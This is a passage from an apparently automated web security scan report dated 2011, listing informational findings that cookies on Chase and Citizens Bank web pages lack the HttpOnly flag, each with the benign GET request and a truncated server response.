Set-Cookie: v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Wed, 02 Feb 2011 15:05:03 GMT
Etag: "596e-4d49729f"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

11.527. https://www.chase.com/wamuwelcome3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /wamuwelcome3/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wamuwelcome3/ HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:50 GMT
Content-length: 14892
Content-type: text/html
Set-Cookie: v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Thu, 06 Jan 2011 22:25:12 GMT
Etag: "3a2c-4d264148"
Accept-ranges: bytes

<html LANG="EN" >

<head>
<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/ChaseGlobal.css'/>
<script language="Javascript1.2" type="text/javascript">
<!--
...[SNIP]...

11.528. http://www.chasemilitary.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.chasemilitary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=OVMPLYSbac2dCKIYK; path=/
Cache-Control: private
Content-Length: 68537
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=4524pqmzsbws5k55rtryev45; path=/; HttpOnly
Date: Wed, 02 Feb 2011 22:16:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv
...[SNIP]...

11.529. http://www.chasestudentloans.com/studentloans  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chasestudentloans.com
Path:   /studentloans

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /studentloans HTTP/1.1
Host: www.chasestudentloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 169
Content-Type: text/html
Location: http://www.chasestudentloans.com/studentloans/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=5DDC70D33F22CF8D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chasestudentloans.com
Date: Wed, 02 Feb 2011 22:16:37 GMT
Connection: close

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.chasestudentloans.com/studentloans/">here</a></body>

11.530. http://www.citizensbank.com/401K_notice.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /401K_notice.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /401K_notice.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:18:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:28:05 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 5704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.531. http://www.citizensbank.com/about-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /about-us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about-us/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:54 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 17629


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.532. http://www.citizensbank.com/branchlocator/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /branchlocator/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /branchlocator/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.533. http://www.citizensbank.com/cards-and-rewards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /cards-and-rewards/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards-and-rewards/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:17:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2>
</body></html>

11.534. http://www.citizensbank.com/cards-and-rewards/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /cards-and-rewards/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards-and-rewards/default.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:17:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2>
</body></html>

11.535. http://www.citizensbank.com/cards-and-rewards/defaultbroad.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /cards-and-rewards/defaultbroad.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards-and-rewards/defaultbroad.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:14 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 21253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.536. http://www.citizensbank.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /careers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:54 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19513


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.537. http://www.citizensbank.com/checking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /checking/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:02 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 32927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.538. http://www.citizensbank.com/checking/banking-packages.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /checking/banking-packages.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/banking-packages.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:02 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 36694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.539. http://www.citizensbank.com/checking/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /checking/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/default.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:02 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 32927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.540. http://www.citizensbank.com/checking/gold-banking-package.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /checking/gold-banking-package.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/gold-banking-package.aspx?WT.ac=circlegoldmoneymarket HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:04 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 53422


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.541. http://www.citizensbank.com/checking/help-me-choose-gateway.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /checking/help-me-choose-gateway.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/help-me-choose-gateway.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:03 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 23849


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.542. http://www.citizensbank.com/checking/order-checks.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /checking/order-checks.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/order-checks.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:03 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 23079


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.543. http://www.citizensbank.com/commercial-banking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /commercial-banking/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /commercial-banking/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:16:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcommercial-banking%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 197

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommercial-banking%252fdefault.aspx">here</a>.</h2>
</body></html>

11.544. http://www.citizensbank.com/community/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /community/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:17:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcommunity%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommunity%252fdefault.aspx">here</a>.</h2>
</body></html>

11.545. http://www.citizensbank.com/customer-service/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /customer-service/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer-service/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:16:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcustomer-service%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcustomer-service%252fdefault.aspx">here</a>.</h2>
</body></html>

11.546. http://www.citizensbank.com/everyday-points/terms-and-conditions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /everyday-points/terms-and-conditions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /everyday-points/terms-and-conditions.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:30 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 30789


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_objCommonHeader_mSe
...[SNIP]...

11.547. http://www.citizensbank.com/greensense/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /greensense/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /greensense/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:41 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <h
...[SNIP]...

11.548. http://www.citizensbank.com/home-equity/find-your-fit.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /home-equity/find-your-fit.aspx

Issue detail

